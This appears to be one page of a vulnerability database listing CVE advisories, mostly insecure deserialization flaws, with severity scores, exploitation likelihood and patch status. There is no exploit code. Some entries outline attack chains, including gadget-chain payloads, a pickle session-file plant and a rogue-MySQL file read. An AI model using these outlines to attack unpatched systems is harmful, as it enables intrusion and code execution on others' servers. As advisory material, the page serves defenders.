exploratory scripts. Koda Reef ### Patch This issue has been patched in version https://github.com/rustfs/rustfs/releases/tag/1.0.0-alpha.94.

SSRF Deserialization Authentication Bypass +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote code execution in Red Hat Apache Camel Infinispan component allows low-privileged attackers to execute arbitrary code via unsafe deserialization in ProtoStream remote aggregation repository. Exploiting this vulnerability requires network access and low-privilege credentials but grants full system compromise affecting confidentiality, integrity, and availability. The attack complexity is rated high (AC:H), suggesting specific configuration or timing requirements. No active exploitation confirmed at time of analysis (not in CISA KEV), and public exploit code status is unknown.

Deserialization RCE Red Hat Build Of Apache Camel 4 For Quarkus 3 +4
NVD
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote code execution in Progress Telerik UI for ASP.NET AJAX via insecure deserialization in the RadFilter control allows unauthenticated remote attackers to execute arbitrary code on the server by tampering with exposed client-side filter state. Affected versions span 2024.4.1114 through 2026.1.421. EPSS data not available; no public exploit or CISA KEV listing identified at time of analysis. The CVSS 8.1 (High) reflects network accessibility but 'High' attack complexity (AC:H), indicating successful exploitation requires specific conditions beyond simple network access.

Deserialization RCE Telerik Ui For Asp Net Ajax
NVD
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Improper error handling in free5GC AMF prior to version 1.4.3 allows remote attackers to invoke the HTTPUEContextTransfer handler with uninitialized request objects by sending requests with unsupported Content-Type headers. The missing default case in the Content-Type switch statement silently skips deserialization without raising an error, resulting in integrity loss when malformed or crafted payloads reach the processor with null/uninitialized state. CVSS score of 5.5 reflects low integrity impact; publicly available exploit code exists (E:P).

Deserialization Amf Free5gc
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM This Month

Fail-open request handling in free5GC UDR's POST /nudr-dr/v2/policy-data/subs-to-notify endpoint allows Policy Data notification subscriptions to be created with invalid, empty, or partially processed input after HTTP body read or deserialization failures. The handler fails to return after sending error responses (HTTP 500 for body read failure, HTTP 400 for deserialization failure), causing execution to continue and invoke the subscription processor with an uninitialized or malformed PolicyDataSubscription object. This is a logic flaw rather than memory corruption or remote code execution, but it violates fail-secure design principles for a write-capable API and may result in inconsistent subscription state or unintended database entries depending on downstream validation behavior.

Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 7.2
HIGH This Week

PHP object injection in MetaSlider Responsive Slider plugin (WordPress) through version 3.106.0 allows authenticated administrators with high privileges to execute arbitrary code by deserializing untrusted data. The vulnerability requires authenticated high-privilege access (PR:H), limiting exploitation to compromised admin accounts or malicious insiders. EPSS data not available; no confirmed active exploitation or public POC identified at time of analysis.

Deserialization Responsive Slider By Metaslider
NVD
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote code execution in OpenMage Magento LTS versions prior to 20.17.0 allows unauthenticated attackers to execute arbitrary code by uploading malicious phar archives disguised as images and triggering PHP deserialization via phar:// stream wrappers. The attack requires high complexity (AC:H) to exploit successfully. EPSS data not available, but exploitation requires specific conditions around file upload and path manipulation. Vendor patch available in version 20.17.0, confirmed by GitHub security advisory GHSA-fg79-cr9c-7369.

PHP Adobe Deserialization +1
NVD GitHub
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Deserialization vulnerability in Apache Airflow webserver (all versions before 3.2.0) allows network-accessible attackers to execute arbitrary code by injecting malicious XCom payloads, despite vendor-assigned Low severity due to the trusted Dag Author threat model. CVSS 9.8 Critical rating reflects unauthenticated network-based RCE capability (AV:N/PR:N), contradicting the description's trust assumption. EPSS 0.07% (22nd percentile) suggests low immediate exploitation likelihood. No active exploitation confirmed; vendor patch available in version 3.2.0 with public GitHub PR.

Apache Deserialization RCE
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Zebra cryptocurrency node prior to version 4.3.1 allocates excessive memory (up to 233,016 addresses) when deserializing addr/addrv2 protocol messages, even though the specification limits messages to 1,000 addresses. An attacker can trigger out-of-memory crashes by sending multiple oversized address messages over different connections. This is a network-accessible denial of service vulnerability affecting all Zebra versions before 4.3.1, with no public exploit code identified but straightforward to execute given the protocol specification.

Denial Of Service Deserialization
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocity-1.7.jar, which pulls in commons-collections-3.2.1.jar containing the InvokerTransformer deserialization gadget chain. Quartz 2.3.2, also bundled in the application, deserializes job data BLOBs from the qrtz_job_details table using ObjectInputStream with no deserialization filter or class allowlist. An authenticated attacker who can write to the Quartz job table, such as through the previously described SQL injection in previewSql, can replace a scheduled job's JOB_DATA with a malicious CommonsCollections6 gadget chain payload. When the Quartz cron trigger fires, the payload is deserialized and executes arbitrary commands as root inside the container, achieving full remote code execution. This issue has been fixed in version 2.10.21.

Deserialization SQLi RCE +1
NVD GitHub
EPSS 0% CVSS 8.3
HIGH PATCH This Week

DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a JDBC parameter blocklist bypass vulnerability in the MySQL datasource configuration. The Mysql class uses Lombok's @Data annotation, which auto-generates a public setter for the illegalParameters field that contains the JDBC security blocklist. When a datasource configuration is submitted as JSON, Jackson deserialization calls setIllegalParameters with an attacker-supplied empty list, replacing the blocklist before getJdbc() validation runs. This allows an authenticated attacker to include dangerous JDBC parameters such as allowLoadLocalInfile=true, and by pointing the datasource at a rogue MySQL server, exploit the LOAD DATA LOCAL INFILE protocol feature to read arbitrary files from the DataEase server filesystem, including sensitive environment variables and database credentials. This issue has been fixed in version 2.10.21.

Deserialization Dataease
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Remote code execution in Digital Knowledge KnowledgeDeliver (all versions prior to February 24, 2026) via malicious ViewState deserialization. A hard-coded ASP.NET machineKey allows unauthenticated remote attackers to bypass ViewState validation and execute arbitrary code on the server. Mandiant reported this critical deserialization vulnerability. EPSS score of 0.08% (24th percentile) suggests low observed exploitation activity, though no public exploit is confirmed at time of analysis. CVSS vector indicates network-accessible attack requiring no privileges or user interaction, but the 7.5 score reflects only Confidentiality impact-real-world RCE capability makes this significantly more severe than the partial CVSS rating suggests.

Deserialization RCE Knowledgedeliver
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Deserialization of untrusted data vulnerability in OpenText, Inc RightFax on Windows, 64 bit, 32 bit allows Object Injection.This issue affects RightFax: through 25.4.

Deserialization Microsoft
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c

Information Disclosure RCE Apple +7
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM This Month

Free5GC UDR service fails to terminate request processing after HTTP body retrieval or JSON deserialization errors in the PUT /nudr-dr/v2/policy-data/subs-to-notify/{subsId} endpoint, allowing unintended modification of Policy Data notification subscriptions with invalid or partially processed input. The handler lacks return statements following error responses, causing execution to continue to the downstream processor with uninitialized or empty subscription objects. No public exploit code or active exploitation has been confirmed; this is a robustness and input validation flaw affecting write operations on a core 5G network function.

Deserialization
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

Unauthenticated access to free5GC UDR subscriber identifiers exposes SUPI/IMSI values via unprotected 5G Service Based Interface endpoint. Missing return statements in free5GC UDR versions prior to 4.2.1 allow attackers to retrieve complete subscriber databases with a single parameterless HTTP GET request, undermining 3GPP SUCI privacy mechanisms. Public exploit code exists. EPSS score is low (0.10%) indicating limited observed exploitation, but impact is severe for exposed deployments with misconfigured network segmentation.

Information Disclosure Deserialization
NVD GitHub
EPSS 2% CVSS 9.6
CRITICAL Act Now

Remote code execution in Adobe Connect 12.10 and earlier (including 2025.3) allows unauthenticated attackers to execute arbitrary code by exploiting unsafe deserialization. Attack requires no user interaction despite UI:R in CVSS vector, with scope change enabling container escape or privilege escalation beyond the application context. Adobe released patch APSB26-37. EPSS score of 1.50% (81st percentile) indicates moderate exploitation probability. No active exploitation confirmed (SSVC: exploitation=none), but deserialization flaws are commonly targeted once details emerge.

RCE Deserialization Adobe
NVD
EPSS 1% CVSS 9.3
CRITICAL Act Now

Remote code execution in Adobe Connect 12.10 and earlier allows unauthenticated network attackers to execute arbitrary code via deserialization of untrusted data. The vulnerability has changed scope (CVSS 9.3), enabling impact beyond the vulnerable component. Adobe issued patch APSB26-37. EPSS indicates 81st percentile risk with 1.44% probability, and CISA SSVC reports no active exploitation. The CVSS vector conflicts with the description: vector indicates user interaction required (UI:R) while description states 'does not require user interaction' - verify actual interaction requirements with Adobe advisory.

RCE Deserialization Adobe
NVD
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Privilege escalation in Azure Monitor Agent versions prior to 1.41.0 exploits insecure deserialization of untrusted data, allowing authenticated local attackers with low privileges to achieve full system compromise (high confidentiality, integrity, and availability impact). CVSS 7.8 severity reflects local attack vector with low complexity and no user interaction required. No public exploit identified at time of analysis, though the vulnerability class (CWE-502) is well-understood and frequently targeted. Microsoft has released patch version 1.41.0 to address this flaw.

Deserialization Microsoft
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft HPC Pack 2019 enables authenticated local attackers to escalate privileges to SYSTEM level. Affects all versions below 6.3.8355. Vendor-released patch available via Microsoft Security Response Center. CVSS 7.8 reflects high impact (complete system compromise) with low attack complexity requiring only low-level authenticated access. No public exploit identified at time of analysis, though CWE-502 deserialization flaws are well-understood and commonly weaponized once technical details emerge.

Deserialization Microsoft
NVD VulDB
EPSS 0% CVSS 7.2
HIGH This Week

PHP object injection in Smart Post Show WordPress plugin versions ≤3.0.12 allows administrators to deserialize untrusted input via the import_shortcodes() function. While no POP chain exists in the plugin itself (making direct exploitation impossible), the vulnerability becomes critical if paired with another plugin/theme containing exploitable gadget chains, potentially enabling file deletion, data exfiltration, or remote code execution. CVSS 7.2 (High) reflects theoretical maximum impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recent CVE identifier.

PHP WordPress Information Disclosure +1
NVD
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Remote code execution via SQL injection in Craft Commerce 4.x (4.0.0-4.10.2) and 5.x (5.0.0-5.5.4) allows authenticated control panel users to write PHP webshells through a four-step exploitation chain. Attack exploits unsanitized TotalRevenue widget settings interpolated into SQL, PDO multi-statement support, and unsafe PHP deserialization in yii2-queue to instantiate a GuzzleHttp FileCookieJar gadget chain. Complete exploitation requires only three HTTP requests and low-privileged authenticati

SQLi Deserialization RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Remote code execution in Pachno 1.0.6 allows unauthenticated attackers to achieve arbitrary code execution by exploiting unsafe deserialization of PHP objects. Attackers write malicious serialized payloads to world-writable cache files with predictable names, which are automatically unserialized during framework bootstrap before authentication occurs. EPSS indicates 0.14% probability of exploitation (33rd percentile), no active exploitation confirmed per CISA KEV, and SSVC classifies this as automatable with total technical impact.

PHP Deserialization RCE
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Arbitrary code execution in Keras 3.13.0 occurs because the TFSMLayer class unconditionally loads attacker-supplied TensorFlow SavedModels while deserializing a .keras model, even with safe_mode=True engaged. Any user who loads a malicious model triggers attacker-controlled code at inference time under their own privileges, defeating the protection safe_mode is supposed to provide. The flaw (CWE-502) has publicly available exploit code via huntr but is not in CISA KEV; EPSS is very low at 0.06% (19th percentile), consistent with the local, user-interaction-dependent attack path.

RCE Deserialization Keras Team Keras
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in Apache Airflow 3.1.x allows authenticated DAG Authors to execute arbitrary code in the webserver context through crafted XCom payloads exploiting insecure deserialization (CWE-502). Affects Apache Airflow versions 3.1.8 through <3.2.0. Despite CVSS 8.8, vendor rates severity as Low due to DAG Authors being highly trusted roles. No public exploit identified at time of analysis, with EPSS exploitation probability at 0.07% (21st percentile), indicating minimal real-world risk. Vendor-released patch: Apache Airflow 3.2.0.

Deserialization Apache RCE
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in Apache Storm before 2.8.6 allows authenticated users with topology submission rights to execute arbitrary code on Nimbus and Worker JVMs via crafted serialized objects in Kerberos TGT credentials. The vulnerability exploits unsafe deserialization in the Nimbus Thrift API (CWE-502) with CVSS 8.8. No active exploitation confirmed (EPSS 0.30%, SSVC exploitation status: none), but the low attack complexity and network attack vector make this a critical patch priority for Storm deployments with authenticated users.

RCE Apache Deserialization
NVD VulDB
EPSS 0% CVSS 6.2
MEDIUM This Month

Deserialization of untrusted data in Samsung Open Source Escargot JavaScript engine prior to commit 97e8115ab1110bc502b4b5e4a0c689a71520d335 allows local attackers without privileges to trigger a denial of service condition via process abort. The vulnerability exploits unsafe deserialization of Java objects, resulting in application termination rather than code execution. No public exploit code or active exploitation has been identified at the time of analysis.

Deserialization Samsung Denial Of Service +1
NVD GitHub VulDB
EPSS 0% CVSS 4.1
MEDIUM This Month

wolfSSL versions up to 5.9.0 allow arbitrary memory deallocation via unsafe deserialization of poisoned session cache data. An attacker with high privileges who can inject a crafted session into the cache and trigger specific session restore API calls can cause memory corruption with availability impact. No public exploit code or active exploitation has been confirmed; the vulnerability requires precise conditions including local access, high privileges, and user interaction.

Deserialization Wolfssl
NVD GitHub VulDB
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in Sonatype Nexus Repository 3.22.1-3.90.2 allows authenticated attackers with task creation permissions to execute arbitrary code via unsafe deserialization in the task management component. Exploitation bypasses the nexus.scripts.allowCreation security control, granting unauthorized code execution on the server. CVSS 9.4 (Critical). No public exploit identified at time of analysis. Attack requires low-privileged authentication (PR:L) and network access but no user interaction.

RCE Deserialization
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

LangChain's f-string prompt-template validation allows information disclosure through attribute access and nested format-specifier injection in DictPromptTemplate and ImagePromptTemplate classes. Unauthenticated remote attackers can craft malicious template strings to expose internal object state, model context, or logs when templates are formatted with rich Python objects. Practical impact is limited to applications that accept untrusted template strings (not just variable values) and pass complex objects into template formatting; hardcoded templates and value-only user input are unaffected. Vendor-released patch available in langchain-core 0.3.84 and 1.2.28.

Python Deserialization Red Hat
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Unsafe YAML deserialization in PraisonAI allows remote code execution through malicious agent definition files. The AgentService.loadAgentFromFile method uses js-yaml.load without safe schema restrictions, permitting dangerous tags like !!js/function that execute arbitrary JavaScript. Unauthenticated attackers can upload crafted YAML files via API endpoints to achieve complete server compromise. Affects PraisonAI prior to v4.5.115. Publicly available exploit code exists via proof-of-concept demonstrating command execution.

RCE Deserialization
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Authenticated remote code execution in Red Hat Quay 3 and Mirror Registry for Red Hat OpenShift arises from unsafe deserialization (CWE-502) of resumable container image layer upload state stored in the database. An attacker with the privileges needed to initiate image uploads can tamper with intermediate upload data to execute arbitrary code on the Quay server. No public exploit identified at time of analysis; EPSS is low (0.06%) and CISA SSVC marks exploitation status as none, though technical impact is rated total.

Red Hat Deserialization RCE +3
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

PHP object injection in Everest Forms for WordPress (all versions ≤3.4.3) allows unauthenticated remote attackers to achieve critical system compromise. Attackers submit malicious serialized payloads through any public form field, which persist through sanitization into the wp_evf_entrymeta database table. When administrators view form entries, unsafe unserialize() without class restrictions processes the payload, enabling arbitrary code execution. CVSS 9.8 (Critical) reflects network-accessible

WordPress PHP Deserialization
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in IBM Langflow Desktop versions 1.6.0 through 1.8.2 allows authenticated attackers to execute arbitrary code via unsafe deserialization in the FAISS component. The vulnerability stems from an insecure default configuration that permits deserialization of untrusted data. With CVSS 8.8 (High) reflecting network accessibility, low complexity, and full impact on confidentiality, integrity, and availability, this represents a critical risk for organizations running affected versions. Vendor-released patch available through IBM security advisory. No public exploit identified at time of analysis, though the attack path is well-understood given the CWE-502 deserialization vulnerability class.

Deserialization RCE IBM
NVD VulDB
EPSS 0% CVSS 7.3
HIGH This Week

Arbitrary code execution in NVIDIA DALI (all versions prior to 2.0) allows local authenticated attackers with low privileges to execute malicious code by exploiting insecure deserialization of untrusted data, requiring user interaction. EPSS exploitation probability and KEV status data not available; no public exploit identified at time of analysis. The vulnerability affects NVIDIA's Data Loading Library, a critical component in AI/ML data preprocessing pipelines.

Nvidia RCE Deserialization +1
NVD VulDB
EPSS 0% CVSS 9.3
CRITICAL POC PATCH Act Now

Remote code execution in OpenIdentityPlatform OpenAM 16.0.5 and earlier allows unauthenticated attackers to execute arbitrary OS commands via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypass exploits an unpatched deserialization sink in JATO's ClientSession.deserializeAttributes() that was overlooked when CVE-2021-35464 was mitigated. Attackers can target any JATO ViewBean endpoint with <jato:form> tags (commonly found in password reset pages) using a PriorityQue

Deserialization RCE Java +5
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Buffer use-after-free in Apache Kafka Java producer client (versions ≤3.9.1, ≤4.0.1, ≤4.1.1) can silently route messages to incorrect topics when batch expiration races with in-flight network requests. CVSS 8.7 (High) with network-accessible attack vector and high complexity. CISA SSVC indicates no active exploitation, non-automatable attack, and partial technical impact. No public exploit identified at time of analysis. EPSS data not provided, but the combination of high CVSS, cross-scope impact (S:C), and dual confidentiality/integrity impact warrants prioritization for environments processing sensitive message streams.

Information Disclosure Memory Corruption Apache +5
NVD HeroDevs
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Remote code execution in HuggingFace Transformers library allows arbitrary code execution via malicious checkpoint files. The `_load_rng_state()` method in the `Trainer` class calls `torch.load()` without the `weights_only=True` parameter, enabling deserialization attacks when PyTorch versions below 2.6 are used with torch>=2.2. An attacker can craft a malicious `rng_state.pth` checkpoint file that executes arbitrary code when loaded by an application using affected Transformers versions. The fix is available in version v5.0.0rc3, and no public exploit has been independently confirmed at time of analysis.

RCE Deserialization Huggingface Transformers
NVD GitHub
EPSS 0% CVSS 2.1
LOW POC PATCH Monitor

Unsafe deserialization in pytries datrie through version 0.8.3 enables remote code execution when loading untrusted trie files via Trie.load(), Trie.read(), or Trie.__setstate__(). Unauthenticated remote attackers can exploit this vulnerability by crafting malicious serialized trie objects; publicly available exploit code exists, and the maintainers have not yet addressed the issue despite early notification.

Deserialization Datrie
NVD VulDB GitHub
EPSS 0% CVSS 6.9
MEDIUM This Month

Unsafe deserialization in FedML-AI FedML's gRPC server allows unauthenticated remote attackers to achieve confidentiality, integrity, and availability compromise through malicious payloads sent to the sendMessage function in versions up to 0.8.9. EPSS data not available; no CISA KEV listing indicates no confirmed active exploitation at time of analysis. Vendor unresponsive to coordinated disclosure attempts, raising concerns about patch availability and ongoing risk for production deployments of this federated machine learning framework.

Deserialization Fedml
NVD VulDB GitHub
EPSS 0% CVSS 7.5
HIGH This Week

Arbitrary code execution in pyload-ng via pickle deserialization allows non-admin users with SETTINGS and ADD permissions to write malicious session files and trigger unauthenticated RCE. Attackers redirect the download directory to Flask's session store (/tmp/pyLoad/flask), plant a crafted pickle payload as a predictable session filename, then trigger deserialization by sending any HTTP request with the corresponding session cookie. This bypasses CVE-2026-33509 fix controls because storage_folder was not added to ADMIN_ONLY_OPTIONS. No public exploit identified at time of analysis, though detailed proof-of-concept methodology is documented in the advisory. EPSS data not available for this recent CVE.

RCE Deserialization Docker +1
NVD GitHub
EPSS 0% CVSS 1.1
LOW Monitor

Unsafe deserialization in NASA cFS Pickle Module (versions up to 7.0.0) allows authenticated local attackers with low privileges to trigger remote code execution or information disclosure through the pickle.load() function. The vulnerability requires high attack complexity and local access, limiting its practical exploitation scope. Public exploit code is available, but the issue remains unpatched as of the last vendor update.

Deserialization Core Flight System
NVD GitHub VulDB
EPSS 0% CVSS 3.7
LOW PATCH Monitor

Unsafe deserialization in Roundcube Webmail's Redis/Memcache session handler allows unauthenticated remote attackers to write arbitrary files by crafting malicious session data. Affected versions include all 1.6.x before 1.6.14 and all 1.5.x before 1.5.14. While the CVSS score of 3.7 is low and attack complexity is high, the integrity impact (arbitrary file write) poses a real risk to instances using Redis or Memcache for session storage.

Deserialization Redis
NVD GitHub VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Remote Code Execution in Group-Office enterprise CRM via insecure deserialization allows authenticated attackers to write arbitrary files and execute code on the server. Affects all versions prior to 6.8.156, 25.0.90, and 26.0.12 across multiple product branches. CVSS 9.9 (Critical) with network-based attack vector requiring only low-privileged authentication. No public exploit identified at time of analysis, though the technical details in the GitHub Security Advisory provide sufficient impleme

Microsoft Deserialization RCE
NVD GitHub
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Remote code execution in OpenSTAManager v2.10.1 and earlier allows authenticated attackers to achieve unauthenticated RCE via chained exploitation of arbitrary SQL injection (GHSA-2fr7-cc4f-wh98) and insecure PHP deserialization in the oauth2.php endpoint. The unauthenticated oauth2.php file calls unserialize() on attacker-controlled database content without class restrictions, enabling gadget chain exploitation (Laravel/RCE22) to execute arbitrary system commands as www-data. Attack requires in

PHP Deserialization Docker +4
NVD GitHub
EPSS 0% CVSS 7.8
HIGH This Week

Deserialization of untrusted data in NVIDIA BioNeMo Framework enables local attackers to execute arbitrary code, cause denial of service, disclose sensitive information, or tamper with data when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction. EPSS data not available; no public exploit identified at time of analysis. Affects NVIDIA BioNeMo Framework, a platform for AI-driven drug discovery and biomolecular research.

Deserialization RCE Denial Of Service +2
NVD VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Insecure deserialization in NVIDIA BioNeMo Framework enables remote code execution when attackers can induce users to process malicious serialized data. This vulnerability (CWE-502) affects the BioNeMo Framework with network-reachable attack surface (AV:N) and low complexity (AC:L), requiring only user interaction (UI:R) but no authentication (PR:N). The CVSS 8.8 rating reflects critical impacts across confidentiality, integrity, and availability. No public exploit identified at time of analysis, though the deserialization vulnerability class is well-understood and commonly exploited. EPSS data not available for this CVE.

Deserialization RCE Denial Of Service +2
NVD VulDB
EPSS 0% CVSS 8.4
HIGH This Week

Insecure deserialization in WatchGuard Fireware OS enables local code execution as the portald user when combined with a filesystem write primitive. Affects Fireware OS versions 12.1 through 12.11.8 and 2025.1 through 2026.1.2 on platforms supporting Access Portal (excludes T-15/T-35 models). CVSS 8.4 severity reflects high impact but requires prior high-privilege local access and an existing write vulnerability to exploit. No public exploit identified at time of analysis, with EPSS data unavailable for risk probability assessment.

Deserialization RCE Fireware Os
NVD VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Insecure deserialization in Gigabyte Control Center's Performance Library component allows authenticated local users to escalate privileges to SYSTEM by sending crafted serialized payloads to the EasyTune Engine service. Affecting Gigabyte Performance Library across versions, this CWE-502 flaw enables low-privileged users to gain complete control of the Windows system. EPSS data not available; no public exploit identified at time of analysis, though the local attack vector and low complexity (CVSS:3.1/AV:L/AC:L/PR:L) suggest exploitation is technically straightforward for attackers with initial local access.

Deserialization Privilege Escalation Performance Library
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary Perl code execution in GRID::Machine through version 0.127 occurs when clients connect to remote hosts via RPC over SSH, as the client-side deserializer uses eval() on untrusted data from the remote peer without validation. A compromised or malicious remote host can inject arbitrary Perl code into Dumper-formatted responses that executes silently on the client during RPC calls, while maintaining correct return values to avoid detection. The vulnerability is design-inherent but the trust requirement for remote hosts is not documented, creating a security expectation mismatch for users.

Deserialization RCE Grid
NVD VulDB
Prev Page 5 of 30 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy